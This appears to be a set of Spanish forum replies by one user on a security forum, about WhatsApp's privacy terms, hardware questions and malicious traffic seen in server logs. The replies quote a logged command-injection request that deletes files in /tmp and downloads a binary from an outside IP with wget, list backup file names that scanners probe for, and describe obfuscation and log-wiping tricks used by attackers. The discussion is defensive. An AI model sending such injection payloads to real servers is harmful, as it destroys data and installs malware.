Mensajes

Hoy es dia 11 y yo aun no he aceptado esos terminos mientras sigo utilizando WhatsApp sin problemas. Pero si hay problemas me voy a Signal o Telegram

Es que no va haber problema o al menos no debería haberlo, por ejemplo cuando WhatsApp saca una nueva versión, te da un tiempo para actualizar e incluso te lo avisa desde la misma app, pero pasado un cierto tiempo que uno no haya actualizado, ahí si te obliga a hacerlo para que puedas seguir utilizando la aplicación, bueno con está nueva versión debería ser lo mismo, es decir que el usuario si o si tiene que tener un aviso de la nueva versión y en las nuevas características de ésta versión estar lo que se comenta en el primer post con respecto a las nuevas políticas de privacidad y condiciones de uso.


Saludos

jajaja pues si, hay solicitudes hasta de quererse descargar el sitio entero:

Código [Seleccionar] Expandir


elhacker.net.tar.gz
backup.rar
www.elhacker.net.tar.gz
www.elhacker.net.gz
www.elhacker.net.7z
elhacker.tar.gz
[...]


aunque también hay de quererse descargar bases de datos y hasta credenciales de acceso.


Saludos

Hola, supongo que también además de conectar los cables de alimentación has conectado también los de datos.

Cuánto tiempo de vida tiene esa fuente de poder?.


Saludos

Hola, puede ser como dijo el compañero de arriba, que te hagan bloqueado o que la cuenta de tus amigos hayan sido eliminadas, y en ese caso esos perfiles ya no existen en Facebook o tal vez Facebook los ha baneado.


Saludos

Hola, yo creo que sí es difícil porque es como estudiar una carrera, que no tan solo es estudiar mucho, sino practicar e incluso en el hacking, el límite para aprender es ilimitado porque siempre se actualiza la tecnología y hay que estudiar lo nuevo o por ejemplo si se descubre un bug 0day, ahi ya se aprende algo nuevo y hasta se puede aprender a parcharlo.

Yo creo que es una vocación, y no, no es para todos.


Saludos

Si es buena idea reportar esas IPs maliciosas, de hecho esta misma petición ya aparece en Google, ya lo han reportado en varios sitios:

https://www.google.com.ar/search?&q=Re%3A+GET+%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B*%3Bwget%2B185.172.111.214%2Fbins%2FUnHAnaAW.x86

En mí servidor VPS no disponía de CloudFlare.

Eso estamos esperando el reporte completo del log del mod_security


Saludos

Hola,

Mañana leeré la noticia y los detalles...
A falta de los mismos y si alguien lo ha leído ya, pregunto...
¿Queda claro qué sucede, si no se tiene cuenta en Facebook, si no solo en WhatsApp?

Seguro que WhatsApp te pedira que crees una porque es un requisito obligatorio.


Saludos

GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Cuándo yo tenía mi foro tenía solicitudes como esas y lo que hacía algunas veces era entrar a esas URL pero desde un script en python nunca del navegador (excepto si usaba view-source:URL) y hasta usaba un proxy anónimo o después cambiaba la IP, cuando entraba en esa dirección guardaba la salida de la descarga en un archivo txt y lo analizaba, algunas veces encontraba código javascript con una redirección a otra URL o a otra IP, pero quería ver el destino, que es lo que realmente quería el atacante que descargue el servidor, y eran script en bash, perl o python, incluso hasta algunos eran en javascript, supongo que javascript para inyectar código malicioso en archivos PHP.

La verdad es interesante ver a dónde van y que contiene lo que te quieren hacer descargar, se puede aprender de esos códigos porque muchos son códigos privados que solo los atacantes los crean, no están publicados, se puede aprender la forma que utilizan para infectar, para no ser detectados, te hacen descargar cosas, instalarlas o llevarte datos de tu servidor al suyo y después borrar todo, por ejemplo borrar los logs, ademas he llegado a ver hasta códigos en reverso y después lo invertian y los ejecutaban, incluso hasta usaban varios lenguajes, por ejemplo te querían descargar en el servidor un archivo bash pero este a su vez descargaba uno en Python y desde Python ejecutaban otro en Perl.

También en esos códigos se podía ver cómo hacían todas las instrucciones y después borraban todo automáticamente para no dejar rastros, pero las formas y métodos que usaban eran interesante, lo mismo con los códigos que los programaban para que hagan tal cosa y realmente hasta sorprendía la forma que utilizaban de lograr lo que querían, todo eso lo analizaba y aprendía.

Otras veces cuando miraba el log de accesos veía como inventaban el URL Referer, ponían páginas o direcciones de IP con datos para que me interese y acceda, como si fuera que en tal dominios o IPs habían datos de mi foro o algo por el estilo, y analizaba esas direcciones desde modo raw mostrando por consola lo que había en el destino o guardaba la salida en un txt y lo miraba, y casi siempre eran puros virus para que los descargue desde el navegador apenas entre a esa dirección, de todas maneras yo usaba Firefox última versión, tenía todas las actualizaciones de Windows, tenía de firewall Comodo, además de Malwarebytes analizando todo el tiempo y también el Malwarebytes anti-rootkit, etc.

Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Llegué a ver también que en los archivos por ejemplo de Python usaban números chars (por ejemplo chr(99)) y estos los unian para formar comandos y así ejecutarlos.


Saludos

Hola, cómo vas a hacer y pedir eso?, Aparte de conseguir claves personales, pensas y querés ingresar en esas cuentas que has hackeado!! 0 ética lo tuyo, buscar en Google en dónde están registradas esas cuentas ajenas y después acceder a ellas no está nada bien.


Saludos

Hola, para que nos comentas eso?, vas a aportar al foro tu creación en batch?, hasta ahora no veo el código.


Saludos